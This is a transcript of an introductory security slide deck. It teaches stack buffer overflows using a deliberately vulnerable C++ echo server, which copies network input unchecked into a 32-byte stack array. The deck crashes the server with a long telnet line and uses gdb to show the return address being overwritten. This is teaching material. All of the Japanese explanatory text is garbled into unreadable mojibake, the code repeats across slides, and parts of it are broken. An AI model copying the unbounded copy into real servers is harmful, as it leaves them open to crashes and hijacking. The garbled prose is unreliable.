
セキュリティ入門

Fadis
April 12, 2018


Transcript

  1. ηΩϡϦςΟೖ໳
    NAOMASA MATSUBAYASHI


  2. ηΩϡϦςΟͷ໨ඪ


  3. େࣄͳσʔλ
    αʔό
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    େࣄͳσʔλΛकΔ࠷΋؆୯Ͱ࣮֬ͳํ๏͸
    Ұ੾ͷΞΫηεΛड͚෇͚ͳ͍ࣄͰ͋Δ


  4. େࣄͳσʔλ
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    αʔό
    ͔͠͠αʔό͸αʔϏεΛఏڙ͢ΔͨΊʹ
    ϢʔβͷཁٻΛड͚෇͚ͳ͚Ε͹ͳΒͳ͍


  5. େࣄͳσʔλ
    ળྑͳϢʔβ
    ѱҙ͋ΔϢʔβ
    αʔό
    ҙਤͨ͠௨Γʹ࢖͏ϢʔβΛड͚෇͚ͳ͕Β
    ҙਤ͠ͳ͍࢖͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ


  6. ༏ΕͨηΩϡϦςΟͱ͸
    ҙਤͨ͠࢖͍ํͱ
    ҙਤ͠ͳ͍࢖͍ํΛ
    ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ


  7. ҙਤ͠ͳ͍࢖͍ํͱ͸


  8. #include
    #include
    #include
    // Short aliases used throughout the echo-server listing.
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    // sock_p and buf_p are declared but not used anywhere in the code shown on these slides.
    using sock_p = std::shared_ptr< tcp::socket >;
    using buf_p = std::shared_ptr< asio::streambuf >;
    // Error type passed to every completion handler below.
    using error_type = boost::system::error_code;
    struct session : public std::enable_shared_from_this< session > {
    // Binds the session's socket to the io_service. The socket is only connected once
    // server::accept() hands it to async_accept via get_socket().
    session( asio::io_service &io ) : sock( io ) {}
    // Arm an asynchronous read that completes at the first '\n' (or on error/EOF).
    // check_on_read receives (bytes_transferred, error). The shared_ptr held by the
    // handler keeps this session alive while the read is pending.
    void read() {
      auto self = shared_from_this();
      asio::async_read_until(
        sock, buf, '\n',
        [self]( const error_type &e, size_t transferred ) {
          self->check_on_read( transferred, e );
        }
      );
    }
    // Queue an asynchronous write of [data, data + len). The bytes are NOT copied by
    // asio::buffer: the caller must keep `data` alive until check_on_write has run.
    void write( const char *data, size_t len ) {
      auto self = shared_from_this();
      asio::async_write(
        sock, asio::buffer( data, len ),
        [self]( const error_type &e, size_t ) { self->check_on_write( e ); }
      );
    }
    // Non-owning access to the connection socket; server::accept() passes it to
    // async_accept so the accepted connection lands directly in this session.
    tcp::socket &get_socket() {
      return sock;
    }
    private:
    // Read-completion gate. Any error other than end-of-stream abandons the session:
    // no further handler is armed, so presumably nothing keeps it alive afterwards.
    // EOF is treated like success so a final unterminated line is still processed.
    void check_on_read( size_t len, const error_type& e ) {
      const bool usable = !e || e == asio::error::eof;
      if( usable ) on_read( len );
    }
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    buf.consume( len );
    https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    όάͷ͋ΔΤίʔαʔό


  9. buf.consume( len );
    received[ len ] = '\0';
    write( received, len );
    }
    // Write-completion gate: only a clean (or EOF) completion goes back to reading;
    // any other error silently ends the session by not re-arming a handler.
    void check_on_write( const error_type& e ) {
      const bool usable = !e || e == asio::error::eof;
      if( usable ) on_write();
    }
    // Echo finished: wait for the next line from the same client.
    void on_write() {
      read();
    }
    tcp::socket sock;    // the accepted connection; handed out via get_socket()
    asio::streambuf buf; // receive buffer that async_read_until fills up to the '\n'
    };
    // Listens on TCP port 20000 (IPv4) and spawns one session per accepted connection.
    // The server object must outlive io_service::run(): on_accept is invoked through
    // a raw `this` captured by the accept handler.
    struct server {
      server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) {
        accept();
      }
      // Create the next session and wait for a client to connect to its socket.
      void accept() {
        auto next = std::make_shared< session >( io );
        acc.async_accept(
          next->get_socket(),
          [this, next]( const error_type &e ) { on_accept( next, e ); }
        );
      }
    private:
      // Start reading on the new session if the accept succeeded, then always re-arm
      // accept() so one failed connection does not stop the listener.
      void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
        if( !e ) s->read();
        accept();
      }
      asio::io_service &io;
      tcp::acceptor acc;
    };
    // Entry point: build the listener and run the event loop until it has no work left.
    int main() {
      asio::io_service io;
      server s( io ); // the constructor already arms the first accept()
      io.run();       // dispatches accept/read/write handlers; returns only when idle
    } // https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    όάͷ͋ΔΤίʔαʔό


  10. }
    // Echo handler: copies the received line into a fixed 32-byte stack buffer and
    // writes it back to the client.
    //
    // DEFECT (the subject of this deck): `len` is whatever async_read_until delivered
    // and is never compared with sizeof(received), so any len >= 32 writes past the end
    // of the array (for len == 32 the NUL store alone does it). The gdb session on the
    // later slides shows the saved return address being overwritten with len=68.
    // DEFECT 2 (not discussed on the slides): `received` is a local, but write() hands
    // its address to async_write, which completes after on_read has returned, so the
    // send reads from a dead stack frame. A correct version has to both bound the copy
    // and use storage that outlives this call (e.g. a std::string member).
    // Note: the template argument of asio::buffer_cast (the pointer type) was lost in
    // the slide export.
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len ); // unbounded copy
    buf.consume( len );
    received[ len ] = '\0'; // out of bounds as soon as len == 32
    write( received, len ); // passes a pointer into this frame to an async operation
    }
    // Write-completion gate: only a clean (or EOF) completion goes back to reading;
    // any other error silently ends the session by not re-arming a handler.
    void check_on_write( const error_type& e ) {
      const bool usable = !e || e == asio::error::eof;
      if( usable ) on_write();
    }
    // Echo finished: wait for the next line from the same client.
    void on_write() {
      read();
    }
    tcp::socket sock;    // the accepted connection; handed out via get_socket()
    asio::streambuf buf; // receive buffer that async_read_until fills up to the '\n'
    };
    // Listens on TCP port 20000 (IPv4) and spawns one session per accepted connection.
    // The server object must outlive io_service::run(): on_accept is invoked through
    // a raw `this` captured by the accept handler.
    struct server {
      server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) {
        accept();
      }
      // Create the next session and wait for a client to connect to its socket.
      void accept() {
        auto next = std::make_shared< session >( io );
        acc.async_accept(
          next->get_socket(),
          [this, next]( const error_type &e ) { on_accept( next, e ); }
        );
      }
    private:
      // Start reading on the new session if the accept succeeded, then always re-arm
      // accept() so one failed connection does not stop the listener.
      void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
        if( !e ) s->read();
        accept();
      }
      asio::io_service &io;
      tcp::acceptor acc;
    };
    int main() {
    asio::io_service io;
    https://wandbox.org/permlink/eucMJp4DkeLhnGlq
    ݻఆ௕ ௨৴Ͱड͚औͬͨσʔλ͕
    ݻఆ௕ͷ഑ྻʹऩ·ΔαΠζͱ͸ݶΒͳ͍
    ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ
    όάͷ͋ΔΤίʔαʔό
    // Echo handler: copies the received line into a fixed 32-byte stack buffer and
    // writes it back to the client.
    //
    // DEFECT (the subject of this deck): `len` is whatever async_read_until delivered
    // and is never compared with sizeof(received), so any len >= 32 writes past the end
    // of the array (for len == 32 the NUL store alone does it). The gdb session on the
    // later slides shows the saved return address being overwritten with len=68.
    // DEFECT 2 (not discussed on the slides): `received` is a local, but write() hands
    // its address to async_write, which completes after on_read has returned, so the
    // send reads from a dead stack frame. A correct version has to both bound the copy
    // and use storage that outlives this call (e.g. a std::string member).
    // Note: the template argument of asio::buffer_cast (the pointer type) was lost in
    // the slide export.
    void on_read( size_t len ) {
    char received[ 32 ];
    std::memcpy( received, asio::buffer_cast( buf.data() ), len ); // unbounded copy
    buf.consume( len );
    received[ len ] = '\0'; // out of bounds as soon as len == 32
    write( received, len ); // passes a pointer into this frame to an async operation
    }


  11. $ ./tiny_server
    $ telnet localhost 20000
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    Hello, World!
    Hello, World!
    ૹ৴ͨ͠σʔλ όΠτ

    ΫϥΠΞϯτ αʔό
    ड৴ͨ͠σʔλ όΠτ

    receivedͷαΠζʹऩ·͍ͬͯΔ৔߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ


  12. $ telnet localhost 20000
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    Hello, World! I would like to
    crash this server. Blah blah
    blah...
    Hello, World! I would like to
    crash this server. Blah blah
    blah...
    Connection closed by foreign
    host.
    ΫϥΠΞϯτ αʔό
    $ ./tiny_server
    Segmentation fault
    αʔό͕ࢮΜͩ


  13. ߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ
    Denial of Service߈ܸ
    ུͯ͠DoS߈ܸ͕Մೳͱݴ͏


  14. ͱ͜ΖͰ͖ͬ͞ͷαʔό͸
    ԿނࢮΜͩ


  15. $ gdb -q tiny_server
    Reading symbols from tiny_server...done.
    (gdb) disas session::on_read
    Dump of assembler code for function session::on_read(unsigned long):

    0x000000000040a6c3 <+69>: callq 0x403340
    0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax

    (gdb) b *0x40a6c3
    Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38.
    (gdb) b *0x40a6c8
    Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏
    Ͳ͜ʹ໰୊͕͋Δ͔͸طʹΘ͔͍ͬͯΔͷͰ
    όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ
    ϒϨʔΫϙΠϯτΛு͓ͬͯ͘


  16. Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
    0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΉ௚લͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ


  17. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΜͩ௚ޙͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ


  18. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    ͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ
    ഑ྻͷऴ୺Λ௒͑ͯ
    ͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ
    receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ


  19. (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    (gdb) backtrace
    #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    #1 0x2e68616c62206861 in ?? ()
    #2 0x000000000a0d2e2e in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    #4 0x0000000000000044 in ?? ()
    #5 0x0000000000632ef0 in ?? ()
    #6 0x00007fffffffd340 in ?? ()
    #7 0x0000000000412898 in boost::get_pointer (
    p=)
    at /usr/include/boost/get_pointer.hpp:69
    Backtrace stopped: Cannot access memory at address 0x6c622068616c4228
    (gdb) disas

    => 0x000000000040a706 <+136>: retq
    End of assembler dump.
    (gdb)
    Կॲ
    ࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵
    όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠
    ݺͼग़͠ݩͷؔ਺ͷΞυϨε͕͓͔͍͠


  20. 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    42 }
    (gdb) backtrace
    #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    #1 0x2e68616c62206861 in ?? ()
    #2 0x000000000a0d2e2e in ?? ()
    ͜ͷΞυϨε͸
    ͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ


  21. CPUͷߏ଄
    CPU
    rax rbx
    rcx rdx
    rsi rdi
    rbp rsp
    r8 r9
    r10 r11
    r12 r13
    r14 r15
    ࠓ೔ͷIntelϓϩηοαʹ͸
    ܭࢉʹ࢖͏஋ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕
    16ݸඋΘ͍ͬͯΔ
    16ݸͰ͸଍Γͳ͘ͳͬͨΒ
    ࠓ͙͍͢Βͳ͍஋ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ


  22. ελοΫ
    CPU
    rax rbx
    rcx rdx
    rsi rdi
    rbp rsp
    r8 r9
    r10 r11
    r12 r13
    r14 r15
    Ϩδελ͔Βୀආͨ͠஋͕ੵ·Ε͍ͯ͘
    ୀආͨ͠஋͕࠶ͼඞཁʹͳͬͨΒ
    ্͔ΒऔΓग़͍ͯ͘͠
    rdi͔ΒҠͨ͠஋
    rax͔ΒҠͨ͠஋
    rbp͔ΒҠͨ͠஋
    rdi͔ΒҠͨ͠஋
    ͜ͷΑ͏ʹ࢖ΘΕΔϝϞϦྖҬΛ
    ελοΫͱݺͿ


  23. ελοΫ
    // Slide example: `i` is a local variable and therefore lives in f's stack frame;
    // it comes into existence on entry and is discarded when f returns.
    int f( int x, int y ) {
    int i;
    i = x * y;
    return i;
    }
    ͜ͷiͷΑ͏ͳϩʔΧϧม਺͸
    ελοΫͷதʹஔ͔Ε͍ͯΔ
    ଞͷม਺౳
    ଞͷม਺౳
    ଞͷม਺౳
    i
    ϩʔΧϧม਺͕࡞ΒΕΔͱελοΫʹ஋͕ੵ·Ε
    είʔϓΛൈ͚ΔͱελοΫͷ஋͕ഁغ͞ΕΔ


    // Matches the disassembly at 4004b6 on this slide: the arguments arrive in
    // %edi/%esi, are spilled into the frame, added, and the sum is returned in %eax.
    int f( int i, int j ) {
    return i + j;
    }
    // Matches the disassembly at 4004ca: loads 3 into %esi and 2 into %edi, then
    // `callq 4004b6` pushes the return address (4004dd) and jumps to f; f's `retq`
    // pops that address and execution continues here.
    int g() {
    return f( 2, 3 );
    }
    ؔ਺ݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ੒͞ΕΔ
    return͢Δͱretq໋ྩ͕ੜ੒͞ΕΔ
    00000000004004b6 <f>:
    4004b6: 55 push %rbp
    4004b7: 48 89 e5 mov %rsp,%rbp
    4004ba: 89 7d fc mov %edi,-0x4(%rbp)
    4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
    4004c0: 8b 55 fc mov -0x4(%rbp),%edx
    4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
    4004c6: 01 d0 add %edx,%eax
    4004c8: 5d pop %rbp
    4004c9: c3 retq
    00000000004004ca <g>:
    4004ca: 55 push %rbp
    4004cb: 48 89 e5 mov %rsp,%rbp
    4004ce: be 03 00 00 00 mov $0x3,%esi
    4004d3: bf 02 00 00 00 mov $0x2,%edi
    4004d8: e8 d9 ff ff ff callq 4004b6
    4004dd: 5d pop %rbp
    4004de: c3 retq
    callq͸ελοΫʹ
    callqͷ࣍ͷΞυϨεΛੵΜͰ
    Ҿ਺Ͱࢦఆ͞ΕͨΞυϨεʹඈͿ
    retq͸ελοΫͷઌ಄ʹੵ·Εͨ
    ΞυϨεʹඈΜͰ
    ελοΫͷઌ಄ͷ஋ΛࣺͯΔ
    ͜ͷ૊Έ߹ΘͤͰ
    ؔ਺Λൈ͚ͨΒݩͷ৔ॴʹ໭Δ
    ͕࣮ݱ͞Ε͍ͯΔ


  25. ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺f͕ؔ਺gΛݺΜͰ
    ͦͷதͰؔ਺h͕ݺ͹Ε͍ͯΔ࣌ͷελοΫ
    ࣮ߦதͷؔ਺ʹͱͬͯͷ
    ελοΫͷઌ಄ͱ຤ඌͷҐஔ͸CPUͷ
    %rspϨδελͱ%rbpϨδελʹ
    ه࿥͞Ε͍ͯΔ


  26. ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺hͷม਺
    ؔ਺͸callq͞ΕͨΒ·ͣ
    ݱࡏͷ%rbpΛελοΫʹੵΜͰ
    %rbpΛ%rspʹ͢Δ
    ͭ·Γݺͼग़͠ݩͷؔ਺ͷελοΫͷઌ಄Λ
    ͜Ε͔Β࣮ߦ͢Δؔ਺ͷελοΫͷ຤ඌʹ͢Δ

    ؔ਺fͷrbp
    ؔ਺gͷrbp
    ؔ਺͔Βretq͢Δ௚લʹ
    %rbpΛελοΫͷઌ಄ͷ஋ʹͯ͠
    ελοΫͷઌ಄ͷ஋Λഁغ͢Δ


    00000000004004b6 <f>:
    4004b6: 55 push %rbp
    4004b7: 48 89 e5 mov %rsp,%rbp
    4004ba: 89 7d fc mov %edi,-0x4(%rbp)
    4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
    4004c0: 8b 55 fc mov -0x4(%rbp),%edx
    4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
    4004c6: 01 d0 add %edx,%eax
    4004c8: 5d pop %rbp
    4004c9: c3 retq
    00000000004004ca <g>:
    4004ca: 55 push %rbp
    4004cb: 48 89 e5 mov %rsp,%rbp
    4004ce: be 03 00 00 00 mov $0x3,%esi
    4004d3: bf 02 00 00 00 mov $0x2,%edi
    4004d8: e8 d9 ff ff ff callq 4004b6
    4004dd: 5d pop %rbp
    4004de: c3 retq
    rbpΛελοΫʹੵΉ
    rbpΛrspͷ஋ʹ͢Δ
    rbpΛελοΫͷ஋ʹ͢Δ
    ελοΫʹॻ͔ΕͨΞυϨεʹ໭Δ
    ͜ͷล͕ؔ਺ͷॲཧͷຊମ


  28. (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
    tiny_server.cpp:38
    38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
    (gdb) p &received
    $1 = (char (*)[32]) 0x7fffffffd2c0
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
    0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
    0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
    0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    ͔͜͜Β্͕
    on_readͷελοΫ
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋
    on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
    on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
    όοϑΝΦʔόʔϥϯલ


  29. 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) c
    Continuing.
    Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
    39 buf.consume( len );
    (gdb) x/40wx 0x7fffffffd2c0
    0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
    0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
    0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
    0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
    0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
    0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
    0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
    0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    (gdb) c
    Continuing.
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
    ͔͜͜Β্͕
    on_readͷελοΫ
    (gdb) i r rsp rbp
    rsp 0x7fffffffd2b0 0x7fffffffd2b0
    rbp 0x7fffffffd2f0 0x7fffffffd2f0
    on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋
    on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
    on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
    όοϑΝΦʔόʔϥϯޙ
    returnΞυϨε͕ॻ͖׵Θͬͯ͠·ͬͨ


  30. #1 0x2e68616c62206861 in ?? ()
